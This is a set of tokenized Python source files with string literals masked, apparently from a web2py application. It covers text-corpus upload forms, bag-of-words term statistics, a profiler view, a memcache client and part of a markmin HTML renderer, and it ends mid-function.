<s> import csv <EOL> import os <EOL> from db . Corpus_DB import Corpus_DB <EOL> import utils . uploads as uploads <EOL> def index ( ) : <EOL> return { } <EOL> def generic_input ( request , form , process_upload ) : <EOL> flash = "<STR_LIT>" <EOL> if form . accepts ( request , session ) : <EOL> ss_fname = form . vars . name + '<STR_LIT>' <EOL> ss_fpath = os . path . join ( uploads . spreadsheet_dir ( request ) , ss_fname ) <EOL> pt_fname = form . vars . name + '<STR_LIT>' <EOL> pt_fpath = os . path . join ( uploads . plaintext_dir ( request ) , pt_fname ) <EOL> if not os . path . isfile ( ss_fpath ) and not os . path . isfile ( pt_fpath ) : <EOL> ssheet , ptext = process_upload ( form ) <EOL> uploads . save_spreadsheet ( request , form . vars . name , ssheet ) <EOL> uploads . save_plaintext ( request , form . vars . name , ptext ) <EOL> flash = "<STR_LIT>" <EOL> else : <EOL> flash = "<STR_LIT>" <EOL> elif form . errors : <EOL> flash = "<STR_LIT>" <EOL> else : <EOL> flash = "<STR_LIT>" <EOL> return { "<STR_LIT>" : form , "<STR_LIT>" : flash } <EOL> def spreadsheet ( ) : <EOL> def ImportSpreadsheet ( dataset_id , spreadsheet_filename , is_csv = False , id_column = '<STR_LIT>' , content_column = '<STR_LIT>' ) : <EOL> dataset_path = '<STR_LIT>' . format ( request . folder , dataset_id ) <EOL> if not os . path . exists ( dataset_path ) : <EOL> os . makedirs ( dataset_path ) <EOL> with Corpus_DB ( path = dataset_path , isImport = True ) as corpus_db : <EOL> corpus_db . ImportFromSpreadsheet ( spreadsheet_filename , is_csv = is_csv , id_key = id_column , content_key = content_column ) <EOL> DOC_ID_FIELD = "<STR_LIT>" <EOL> DOC_CONTENT_FIELD = "<STR_LIT>" <EOL> form = FORM ( <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = "<STR_LIT:name>" , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = DOC_ID_FIELD , value = DOC_ID_FIELD , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = DOC_CONTENT_FIELD , value = DOC_CONTENT_FIELD , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = "<STR_LIT>" , _type = "<STR_LIT:file>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> INPUT ( _type = "<STR_LIT>" ) <EOL> ) <EOL> def process_upload ( form ) : <EOL> upload = form . vars . corpus . file <EOL> ptext = [ ] <EOL> reader = csv . DictReader ( upload , delimiter = "<STR_LIT:U+002C>" ) <EOL> field_map = { form . vars . doc_id : DOC_ID_FIELD , form . vars . doc_content : DOC_CONTENT_FIELD } <EOL> ssheet = [ [ field_map [ field ] if field in field_map else field <EOL> for field in reader . fieldnames ] ] <EOL> for row in reader : <EOL> ssheet . append ( row ) <EOL> ptext . append ( "<STR_LIT>" . format ( row [ DOC_ID_FIELD ] , row [ DOC_CONTENT_FIELD ] ) ) <EOL> return ( ssheet , "<STR_LIT>" . join ( ptext ) ) <EOL> return generic_input ( request , form , process_upload ) <EOL> def plaintext ( ) : <EOL> def ImportPlaintext ( dataset_id , plaintext_filename ) : <EOL> dataset_path = '<STR_LIT>' . format ( request . folder , dataset_id ) <EOL> if not os . path . exists ( dataset_path ) : <EOL> os . makedirs ( dataset_path ) <EOL> with Corpus_DB ( path = dataset_path , isImport = True ) as corpus_db : <EOL> corpus_db . ImportFromFile ( plaintext_filename ) <EOL> form = FORM ( <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = "<STR_LIT:name>" , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> BR ( ) , <EOL> TEXTAREA ( _name = '<STR_LIT>' , value = '<STR_LIT>' , requires = IS_NOT_EMPTY ( ) ) , <EOL> INPUT ( _type = "<STR_LIT>" ) <EOL> ) <EOL> def process_upload ( form ) : <EOL> upload = form . vars . corpus <EOL> ptext = [ ] <EOL> ssheet = [ [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> for n , line in enumerate ( upload . split ( "<STR_LIT:\n>" ) ) : <EOL> ptext . append ( str ( n ) + "<STR_LIT:U+0020>" + line . strip ( ) ) <EOL> ssheet . append ( { "<STR_LIT>" : str ( n ) , <EOL> "<STR_LIT>" : line . strip ( ) } ) <EOL> return ( ssheet , "<STR_LIT:\n>" . join ( ptext ) ) <EOL> return generic_input ( request , form , process_upload ) </s>
<s> from handlers . Home_Core import Home_Core <EOL> class BOW_Core ( Home_Core ) : <EOL> def __init__ ( self , request , response , bow_db ) : <EOL> super ( BOW_Core , self ) . __init__ ( request , response ) <EOL> self . bowDB = bow_db <EOL> self . db = bow_db . db <EOL> def GetDocLimits ( self ) : <EOL> docOffset = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> docLimit = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> self . params . update ( { <EOL> '<STR_LIT>' : docOffset , <EOL> '<STR_LIT>' : docLimit <EOL> } ) <EOL> if docOffset is None : <EOL> docOffset = <NUM_LIT:0> <EOL> if docLimit is None : <EOL> docLimit = <NUM_LIT:5> <EOL> return docOffset , docLimit <EOL> def GetTermLimits ( self ) : <EOL> termOffset = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> termLimit = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> self . params . update ( { <EOL> '<STR_LIT>' : termOffset , <EOL> '<STR_LIT>' : termLimit <EOL> } ) <EOL> if termOffset is None : <EOL> termOffset = <NUM_LIT:0> <EOL> if termLimit is None : <EOL> termLimit = <NUM_LIT:5> <EOL> return termOffset , termLimit <EOL> def GetCellLimits ( self ) : <EOL> cellLimit = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> self . params . update ( { <EOL> '<STR_LIT>' : cellLimit <EOL> } ) <EOL> if cellLimit is None : <EOL> cellLimit = <NUM_LIT:100> <EOL> return cellLimit <EOL> def LoadTermStats ( self , table_name , var_name , field_name ) : <EOL> termOffset , termLimit = self . GetTermLimits ( ) <EOL> query = """<STR_LIT>""" . format ( <EOL> FIELD = field_name , TABLE = table_name , LIMIT = termLimit , OFFSET = termOffset ) <EOL> rows = self . db . executesql ( query , as_dict = True ) <EOL> header = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : self . db . term_texts . term_text . type } , <EOL> { '<STR_LIT:name>' : field_name , '<STR_LIT:type>' : self . db [ table_name ] . value . type } <EOL> ] <EOL> self . content . update ( { <EOL> var_name : rows , <EOL> '<STR_LIT>' : termLimit , <EOL> '<STR_LIT>' : termOffset , <EOL> '<STR_LIT>' : self . db ( self . db . term_texts ) . count ( ) <EOL> } ) <EOL> self . table = rows <EOL> self . header = header <EOL> def LoadCoTermStats ( self , table_name , var_name ) : <EOL> termOffset , termLimit = self . GetTermLimits ( ) <EOL> query = """<STR_LIT>""" . format ( <EOL> TABLE = table_name , LIMIT = termLimit , OFFSET = termOffset ) <EOL> rows = self . db . executesql ( query , as_dict = True ) <EOL> header = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : self . db . term_texts . term_text . type } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : self . db . term_texts . term_text . type } , <EOL> { '<STR_LIT:name>' : '<STR_LIT:value>' , '<STR_LIT:type>' : self . db [ table_name ] . value . type } <EOL> ] <EOL> self . content . update ( { <EOL> var_name : rows , <EOL> '<STR_LIT>' : termLimit , <EOL> '<STR_LIT>' : termOffset , <EOL> '<STR_LIT>' : self . db ( self . db [ table_name ] ) . count ( ) , <EOL> '<STR_LIT>' : self . db ( self . db . term_texts ) . count ( ) <EOL> } ) <EOL> self . table = rows <EOL> self . header = header <EOL> def LoadTermFreqs ( self ) : <EOL> self . LoadTermStats ( self . db . term_freqs , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def LoadTermProbs ( self ) : <EOL> self . LoadTermStats ( self . db . term_probs , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def LoadTermCoFreqs ( self ) : <EOL> self . LoadCoTermStats ( self . db . term_co_freqs , '<STR_LIT>' ) <EOL> def LoadTermCoProbs ( self ) : <EOL> self . LoadCoTermStats ( self . db . term_co_probs , '<STR_LIT>' ) <EOL> def LoadTermG2 ( self ) : <EOL> self . LoadCoTermStats ( self . db . term_g2 , '<STR_LIT>' ) <EOL> def LoadSentenceCoFreqs ( self ) : <EOL> self . LoadCoTermStats ( self . db . sentences_co_freqs , '<STR_LIT>' ) <EOL> def LoadSentenceCoProbs ( self ) : <EOL> self . LoadCoTermStats ( self . db . sentences_co_probs , '<STR_LIT>' ) <EOL> def LoadSentenceG2 ( self ) : <EOL> self . LoadCoTermStats ( self . db . sentences_g2 , '<STR_LIT>' ) </s>
<s> import os <EOL> from gluon . settings import global_settings , read_file <EOL> def index ( ) : <EOL> app = request . args ( <NUM_LIT:0> ) <EOL> return dict ( app = app ) <EOL> def profiler ( ) : <EOL> """<STR_LIT>""" <EOL> KEY = '<STR_LIT>' <EOL> filename = global_settings . cmd_options . profiler_filename <EOL> data = '<STR_LIT>' <EOL> if filename : <EOL> if KEY in request . cookies : <EOL> size = int ( request . cookies [ KEY ] . value ) <EOL> else : <EOL> size = <NUM_LIT:0> <EOL> if os . path . exists ( filename ) : <EOL> data = read_file ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> if size < len ( data ) : <EOL> data = data [ size : ] <EOL> else : <EOL> size = <NUM_LIT:0> <EOL> size += len ( data ) <EOL> response . cookies [ KEY ] = size <EOL> return data </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> from google . appengine . api . memcache import Client <EOL> class MemcacheClient ( object ) : <EOL> client = Client ( ) <EOL> def __init__ ( self , request , default_time_expire = <NUM_LIT> ) : <EOL> self . request = request <EOL> self . default_time_expire = default_time_expire <EOL> def __call__ ( <EOL> self , <EOL> key , <EOL> f , <EOL> time_expire = None , <EOL> ) : <EOL> if time_expire is None : <EOL> time_expire = self . default_time_expire <EOL> key = '<STR_LIT>' % ( self . request . application , key ) <EOL> value = None <EOL> obj = self . client . get ( key ) <EOL> if obj : <EOL> value = obj [ <NUM_LIT:1> ] <EOL> elif f is not None : <EOL> value = f ( ) <EOL> self . client . set ( key , ( time . time ( ) , value ) , time = time_expire ) <EOL> return value <EOL> def increment ( self , key , value = <NUM_LIT:1> ) : <EOL> key = '<STR_LIT>' % ( self . request . application , key ) <EOL> obj = self . client . get ( key ) <EOL> if obj : <EOL> value = obj [ <NUM_LIT:1> ] + value <EOL> self . client . set ( key , ( time . time ( ) , value ) ) <EOL> return value <EOL> def incr ( self , key , value = <NUM_LIT:1> ) : <EOL> return self . increment ( key , value ) <EOL> def clear ( self , key = None ) : <EOL> if key : <EOL> key = '<STR_LIT>' % ( self . request . application , key ) <EOL> self . client . delete ( key ) <EOL> else : <EOL> self . client . flush_all ( ) <EOL> def delete ( self , * a , ** b ) : <EOL> return self . client . delete ( * a , ** b ) <EOL> def get ( self , * a , ** b ) : <EOL> return self . client . get ( * a , ** b ) <EOL> def set ( self , * a , ** b ) : <EOL> return self . client . set ( * a , ** b ) <EOL> def flush_all ( self , * a , ** b ) : <EOL> return self . client . delete ( * a , ** b ) </s>
<s> import re <EOL> import urllib <EOL> from cgi import escape <EOL> from string import maketrans <EOL> try : <EOL> from ast import parse as ast_parse <EOL> import ast <EOL> except ImportError : <EOL> from compiler import parse <EOL> import compiler . ast as ast <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __doc__ = """<STR_LIT>""" <EOL> html_colors = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> META = '<STR_LIT>' <EOL> LINK = '<STR_LIT>' <EOL> DISABLED_META = '<STR_LIT>' <EOL> LATEX = '<STR_LIT>' <EOL> regex_URL = re . compile ( r'<STR_LIT>' ) <EOL> regex_env2 = re . compile ( r'<STR_LIT>' ) <EOL> regex_expand_meta = re . compile ( '<STR_LIT:(>' + META + '<STR_LIT:|>' + DISABLED_META + '<STR_LIT>' ) <EOL> regex_dd = re . compile ( r'<STR_LIT>' ) <EOL> regex_code = re . compile ( '<STR_LIT:(>' + META + '<STR_LIT:|>' + DISABLED_META + r'<STR_LIT>' , re . S ) <EOL> regex_strong = re . compile ( r'<STR_LIT>' ) <EOL> regex_del = re . compile ( r'<STR_LIT>' ) <EOL> regex_em = re . compile ( r"<STR_LIT>" ) <EOL> regex_num = re . compile ( r"<STR_LIT>" ) <EOL> regex_list = re . compile ( '<STR_LIT>' ) <EOL> regex_bq_headline = re . compile ( '<STR_LIT>' ) <EOL> regex_tq = re . compile ( '<STR_LIT>' ) <EOL> regex_proto = re . compile ( r'<STR_LIT>' , re . M ) <EOL> regex_auto = re . compile ( r'<STR_LIT>' , re . M ) <EOL> regex_link = re . compile ( r'<STR_LIT:(>' + LINK + r'<STR_LIT>' , re . S ) <EOL> regex_link_level2 = re . compile ( r'<STR_LIT>' , re . S ) <EOL> regex_media_level2 = re . compile ( r'<STR_LIT>' , re . S ) <EOL> regex_markmin_escape = re . compile ( r"<STR_LIT>" ) <EOL> regex_backslash = re . compile ( r"<STR_LIT>" ) <EOL> ttab_in = maketrans ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> ttab_out = maketrans ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> regex_quote = re . compile ( '<STR_LIT>' ) <EOL> def make_dict ( b ) : <EOL> return '<STR_LIT>' % regex_quote . sub ( "<STR_LIT>" , b ) <EOL> def safe_eval ( node_or_string , env ) : <EOL> """<STR_LIT>""" <EOL> _safe_names = { '<STR_LIT:None>' : None , '<STR_LIT:True>' : True , '<STR_LIT:False>' : False } <EOL> _safe_names . update ( env ) <EOL> if isinstance ( node_or_string , basestring ) : <EOL> node_or_string = ast_parse ( node_or_string , mode = '<STR_LIT>' ) <EOL> if isinstance ( node_or_string , ast . Expression ) : <EOL> node_or_string = node_or_string . body <EOL> def _convert ( node ) : <EOL> if isinstance ( node , ast . Str ) : <EOL> return node . s <EOL> elif isinstance ( node , ast . Num ) : <EOL> return node . n <EOL> elif isinstance ( node , ast . Tuple ) : <EOL> return tuple ( map ( _convert , node . elts ) ) <EOL> elif isinstance ( node , ast . List ) : <EOL> return list ( map ( _convert , node . elts ) ) <EOL> elif isinstance ( node , ast . Dict ) : <EOL> return dict ( ( _convert ( k ) , _convert ( v ) ) for k , v <EOL> in zip ( node . keys , node . values ) ) <EOL> elif isinstance ( node , ast . Name ) : <EOL> if node . id in _safe_names : <EOL> return _safe_names [ node . id ] <EOL> elif isinstance ( node , ast . BinOp ) and isinstance ( node . op , ( Add , Sub ) ) and isinstance ( node . right , Num ) and isinstance ( node . right . n , complex ) and isinstance ( node . left , Num ) and isinstance ( node . left . n , ( int , long , float ) ) : <EOL> left = node . left . n <EOL> right = node . right . n <EOL> if isinstance ( node . op , Add ) : <EOL> return left + right <EOL> else : <EOL> return left - right <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return _convert ( node_or_string ) <EOL> def markmin_escape ( text ) : <EOL> """<STR_LIT>""" <EOL> return regex_markmin_escape . sub ( <EOL> lambda m : '<STR_LIT:\\>' + m . group ( <NUM_LIT:0> ) . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) , text ) <EOL> def replace_autolinks ( text , autolinks ) : <EOL> return regex_auto . sub ( lambda m : autolinks ( m . group ( '<STR_LIT:k>' ) ) , text ) <EOL> def replace_at_urls ( text , url ) : <EOL> def u1 ( match , url = url ) : <EOL> a , c , f , args = match . group ( '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:f>' , '<STR_LIT:args>' ) <EOL> return url ( a = a or None , c = c or None , f = f or None , <EOL> args = ( args or '<STR_LIT>' ) . split ( '<STR_LIT:/>' ) , scheme = True , host = True ) <EOL> return regex_URL . sub ( u1 , text ) <EOL> def replace_components ( text , env ) : <EOL> def u2 ( match , env = env ) : <EOL> f = env . get ( match . group ( '<STR_LIT:a>' ) , match . group ( <NUM_LIT:0> ) ) <EOL> if callable ( f ) : <EOL> b = match . group ( '<STR_LIT:b>' ) <EOL> try : <EOL> b = safe_eval ( make_dict ( b ) , env ) <EOL> except : <EOL> pass <EOL> try : <EOL> f = f ( ** b ) if isinstance ( b , dict ) else f ( b ) <EOL> except Exception , e : <EOL> f = '<STR_LIT>' % e <EOL> return str ( f ) <EOL> text = regex_env2 . sub ( u2 , text ) <EOL> return text <EOL> def autolinks_simple ( url ) : <EOL> """<STR_LIT>""" <EOL> u_url = url . lower ( ) <EOL> if '<STR_LIT:@>' in url and not '<STR_LIT>' in url : <EOL> return '<STR_LIT>' % ( url , url ) <EOL> elif u_url . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return '<STR_LIT>' % url <EOL> elif u_url . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return '<STR_LIT>' % url <EOL> elif u_url . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return '<STR_LIT>' % url <EOL> return '<STR_LIT>' % ( url , url ) <EOL> def protolinks_simple ( proto , url ) : <EOL> """<STR_LIT>""" <EOL> if proto in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' % url <EOL> elif proto == '<STR_LIT>' : <EOL> return '<STR_LIT>' % url <EOL> return proto + '<STR_LIT::>' + url <EOL> def email_simple ( email ) : <EOL> return '<STR_LIT>' % ( email , email ) <EOL> def render ( text , <EOL> extra = { } , <EOL> allowed = { } , <EOL> sep = '<STR_LIT:p>' , <EOL> URL = None , <EOL> environment = None , <EOL> latex = '<STR_LIT>' , <EOL> autolinks = '<STR_LIT:default>' , <EOL> protolinks = '<STR_LIT:default>' , <EOL> class_prefix = '<STR_LIT>' , <EOL> id_prefix = '<STR_LIT>' , <EOL> pretty_print = False ) : <EOL> """<STR_LIT>""" <EOL> if autolinks == "<STR_LIT:default>" : autolinks = autolinks_simple <EOL> if protolinks == "<STR_LIT:default>" : protolinks = protolinks_simple <EOL> pp = '<STR_LIT:\n>' if pretty_print else '<STR_LIT>' <EOL> if isinstance ( text , unicode ) : <EOL> text = text . encode ( '<STR_LIT:utf8>' ) <EOL> text = str ( text or '<STR_LIT>' ) <EOL> text = regex_backslash . sub ( lambda m : m . group ( <NUM_LIT:1> ) . translate ( ttab_in ) , text ) <EOL> text = text . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) <EOL> if URL is not None : <EOL> text = replace_at_urls ( text , URL ) <EOL> if latex == '<STR_LIT>' : <EOL> text = regex_dd . sub ( '<STR_LIT>' , text ) <EOL> segments = [ ] <EOL> def mark_code ( m ) : <EOL> g = m . group ( <NUM_LIT:0> ) <EOL> if g in ( META , DISABLED_META ) : <EOL> segments . append ( ( None , None , None , g ) ) <EOL> return m . group ( ) <EOL> elif g == '<STR_LIT>' : <EOL> segments . append ( ( None , None , None , '<STR_LIT>' ) ) <EOL> return m . group ( ) <EOL> else : <EOL> c = m . group ( '<STR_LIT:c>' ) or '<STR_LIT>' <EOL> p = m . group ( '<STR_LIT:p>' ) or '<STR_LIT>' <EOL> if '<STR_LIT:code>' in allowed and not c in allowed [ '<STR_LIT:code>' ] : c = '<STR_LIT>' <EOL> code = m . group ( '<STR_LIT:t>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> segments . append ( ( code , c , p , m . group ( <NUM_LIT:0> ) ) ) <EOL> return META <EOL> text = regex_code . sub ( mark_code , text ) <EOL> links = [ ] <EOL> def mark_link ( m ) : <EOL> links . append ( None if m . group ( ) == LINK <EOL> else m . group ( '<STR_LIT:s>' ) ) <EOL> return LINK <EOL> text = regex_link . sub ( mark_link , text ) <EOL> text = escape ( text ) <EOL> if protolinks : <EOL> text = regex_proto . sub ( lambda m : protolinks ( * m . group ( '<STR_LIT:p>' , '<STR_LIT:k>' ) ) , text ) <EOL> if autolinks : <EOL> text = replace_autolinks ( text , autolinks ) <EOL> strings = text . split ( '<STR_LIT:\n>' ) <EOL> def parse_title ( t , s ) : <EOL> hlevel = str ( len ( t ) ) <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> out . append ( "<STR_LIT>" % ( hlevel , s ) ) <EOL> etags [ : ] = [ "<STR_LIT>" % ( hlevel , pp ) ] <EOL> lev = <NUM_LIT:0> <EOL> ltags [ : ] = [ ] <EOL> tlev [ : ] = [ ] <EOL> return ( lev , '<STR_LIT:h>' ) <EOL> def parse_list ( t , p , s , tag , lev , mtag , lineno ) : <EOL> lent = len ( t ) <EOL> if lent < lev : <EOL> while ltags [ - <NUM_LIT:1> ] > lent : <EOL> ltags . pop ( ) <EOL> out . append ( etags . pop ( ) ) <EOL> lev = lent <EOL> tlev [ lev : ] = [ ] <EOL> if lent > lev : <EOL> if lev == <NUM_LIT:0> : <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> ltags [ : ] = [ ] <EOL> tlev [ : ] = [ ] <EOL> etags [ : ] = [ ] <EOL> if pend and mtag == '<STR_LIT:.>' : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> for i in xrange ( lent - lev ) : <EOL> out . append ( '<STR_LIT:<>' + tag + '<STR_LIT:>>' + pp ) <EOL> etags . append ( '<STR_LIT>' + tag + '<STR_LIT:>>' + pp ) <EOL> lev += <NUM_LIT:1> <EOL> ltags . append ( lev ) <EOL> tlev . append ( tag ) <EOL> elif lent == lev : <EOL> if tlev [ - <NUM_LIT:1> ] != tag : <EOL> for i in xrange ( ltags . count ( lent ) ) : <EOL> ltags . pop ( ) <EOL> out . append ( etags . pop ( ) ) <EOL> tlev [ - <NUM_LIT:1> ] = tag <EOL> out . append ( '<STR_LIT:<>' + tag + '<STR_LIT:>>' + pp ) <EOL> etags . append ( '<STR_LIT>' + tag + '<STR_LIT:>>' + pp ) <EOL> ltags . append ( lev ) <EOL> else : <EOL> if ltags . count ( lev ) > <NUM_LIT:1> : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> mtag = '<STR_LIT:l>' <EOL> out . append ( '<STR_LIT>' ) <EOL> etags . append ( '<STR_LIT>' + pp ) <EOL> ltags . append ( lev ) <EOL> if s [ : <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> ( s , mtag , lineno ) = parse_table_or_blockquote ( s , mtag , lineno ) <EOL> if p and mtag == '<STR_LIT:l>' : <EOL> ( lev , mtag , lineno ) = parse_point ( t , s , lev , '<STR_LIT>' , lineno ) <EOL> else : <EOL> out . append ( s ) <EOL> return ( lev , mtag , lineno ) <EOL> def parse_point ( t , s , lev , mtag , lineno ) : <EOL> """<STR_LIT>""" <EOL> lent = len ( t ) <EOL> if lent > lev : <EOL> return parse_list ( t , '<STR_LIT:.>' , s , '<STR_LIT>' , lev , mtag , lineno ) <EOL> elif lent < lev : <EOL> while ltags [ - <NUM_LIT:1> ] > lent : <EOL> ltags . pop ( ) <EOL> out . append ( etags . pop ( ) ) <EOL> lev = lent <EOL> tlev [ lev : ] = [ ] <EOL> mtag = '<STR_LIT>' <EOL> elif lent == lev : <EOL> if pend and mtag == '<STR_LIT:.>' : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> if br and mtag in ( '<STR_LIT:l>' , '<STR_LIT:.>' ) : <EOL> out . append ( br ) <EOL> if s == META : <EOL> mtag = '<STR_LIT>' <EOL> else : <EOL> mtag = '<STR_LIT:.>' <EOL> if s [ : <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> ( s , mtag , lineno ) = parse_table_or_blockquote ( s , mtag , lineno ) <EOL> if mtag == '<STR_LIT:.>' : <EOL> out . append ( pbeg ) <EOL> if pend : <EOL> etags . append ( pend ) <EOL> ltags . append ( lev ) <EOL> out . append ( s ) <EOL> return ( lev , mtag , lineno ) <EOL> def parse_table_or_blockquote ( s , mtag , lineno ) : <EOL> if ( lineno + <NUM_LIT:1> >= strings_len or <EOL> not ( s . count ( '<STR_LIT:->' ) == len ( s ) and len ( s ) > <NUM_LIT:3> ) ) : <EOL> return ( s , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> s = strings [ lineno ] . strip ( ) <EOL> if s : <EOL> if '<STR_LIT:|>' in s : <EOL> tout = [ ] <EOL> thead = [ ] <EOL> tbody = [ ] <EOL> rownum = <NUM_LIT:0> <EOL> t_id = '<STR_LIT>' <EOL> t_cls = '<STR_LIT>' <EOL> while lineno < strings_len : <EOL> s = strings [ lineno ] . strip ( ) <EOL> if s [ : <NUM_LIT:1> ] == '<STR_LIT:=>' : <EOL> if s . count ( '<STR_LIT:=>' ) == len ( s ) and len ( s ) > <NUM_LIT:3> : <EOL> if not thead : <EOL> thead = tout <EOL> else : <EOL> tbody . extend ( tout ) <EOL> tout = [ ] <EOL> rownum = <NUM_LIT:0> <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> m = regex_tq . match ( s ) <EOL> if m : <EOL> t_cls = m . group ( '<STR_LIT:c>' ) or '<STR_LIT>' <EOL> t_id = m . group ( '<STR_LIT:p>' ) or '<STR_LIT>' <EOL> break <EOL> if rownum % <NUM_LIT:2> : <EOL> tr = '<STR_LIT>' <EOL> else : <EOL> tr = '<STR_LIT>' if rownum == <NUM_LIT:0> else '<STR_LIT>' <EOL> tout . append ( tr + '<STR_LIT>' . join ( [ '<STR_LIT>' % ( <EOL> '<STR_LIT>' <EOL> if regex_num . match ( f ) else '<STR_LIT>' , <EOL> f . strip ( ) <EOL> ) for f in s . split ( '<STR_LIT:|>' ) ] ) + '<STR_LIT>' + pp ) <EOL> rownum += <NUM_LIT:1> <EOL> lineno += <NUM_LIT:1> <EOL> t_cls = '<STR_LIT>' % ( class_prefix , t_cls ) if t_cls and t_cls != '<STR_LIT:id>' else '<STR_LIT>' <EOL> t_id = '<STR_LIT>' % ( id_prefix , t_id ) if t_id else '<STR_LIT>' <EOL> s = '<STR_LIT>' <EOL> if thead : <EOL> s += '<STR_LIT>' + pp + '<STR_LIT>' . join ( [ l for l in thead ] ) + '<STR_LIT>' + pp <EOL> if not tbody : <EOL> tbody = tout <EOL> tout = [ ] <EOL> if tbody : <EOL> s += '<STR_LIT>' + pp + '<STR_LIT>' . join ( [ l for l in tbody ] ) + '<STR_LIT>' + pp <EOL> if tout : <EOL> s += '<STR_LIT>' + pp + '<STR_LIT>' . join ( [ l for l in tout ] ) + '<STR_LIT>' + pp <EOL> s = '<STR_LIT>' % ( t_cls , t_id , pp , s , pp ) <EOL> mtag = '<STR_LIT:t>' <EOL> else : <EOL> bq_begin = lineno <EOL> t_mode = False <EOL> t_cls = '<STR_LIT>' <EOL> t_id = '<STR_LIT>' <EOL> while lineno < strings_len : <EOL> s = strings [ lineno ] . strip ( ) <EOL> if not t_mode : <EOL> m = regex_tq . match ( s ) <EOL> if m : <EOL> if ( lineno + <NUM_LIT:1> == strings_len or <EOL> '<STR_LIT:|>' not in strings [ lineno + <NUM_LIT:1> ] ) : <EOL> t_cls = m . group ( '<STR_LIT:c>' ) or '<STR_LIT>' <EOL> t_id = m . group ( '<STR_LIT:p>' ) or '<STR_LIT>' <EOL> break <EOL> if regex_bq_headline . match ( s ) : <EOL> if ( lineno + <NUM_LIT:1> < strings_len and <EOL> strings [ lineno + <NUM_LIT:1> ] . strip ( ) ) : <EOL> t_mode = True <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> elif regex_tq . match ( s ) : <EOL> t_mode = False <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> lineno += <NUM_LIT:1> <EOL> t_cls = '<STR_LIT>' % ( class_prefix , t_cls ) if t_cls and t_cls != '<STR_LIT:id>' else '<STR_LIT>' <EOL> t_id = '<STR_LIT>' % ( id_prefix , t_id ) if t_id else '<STR_LIT>' <EOL> s = '<STR_LIT>' % ( t_cls , <EOL> t_id , <EOL> '<STR_LIT:\n>' . join ( strings [ bq_begin : lineno ] ) , pp ) <EOL> mtag = '<STR_LIT:q>' <EOL> else : <EOL> s = '<STR_LIT>' <EOL> lineno -= <NUM_LIT:1> <EOL> mtag = '<STR_LIT:q>' <EOL> return ( s , '<STR_LIT:q>' , lineno ) <EOL> if sep == '<STR_LIT:p>' : <EOL> pbeg = "<STR_LIT>" <EOL> pend = "<STR_LIT>" + pp <EOL> br = '<STR_LIT>' <EOL> else : <EOL> pbeg = pend = '<STR_LIT>' <EOL> br = "<STR_LIT>" + pp if sep == '<STR_LIT>' else '<STR_LIT>' <EOL> lev = <NUM_LIT:0> <EOL> c0 = '<STR_LIT>' <EOL> out = [ ] <EOL> etags = [ ] <EOL> ltags = [ ] <EOL> tlev = [ ] <EOL> mtag = '<STR_LIT>' <EOL> lineno = <NUM_LIT:0> <EOL> strings_len = len ( strings ) <EOL> while lineno < strings_len : <EOL> s0 = strings [ lineno ] [ : <NUM_LIT:1> ] <EOL> s = strings [ lineno ] . strip ( ) <EOL> """<STR_LIT>""" <EOL> pc0 = c0 <EOL> c0 = s [ : <NUM_LIT:1> ] 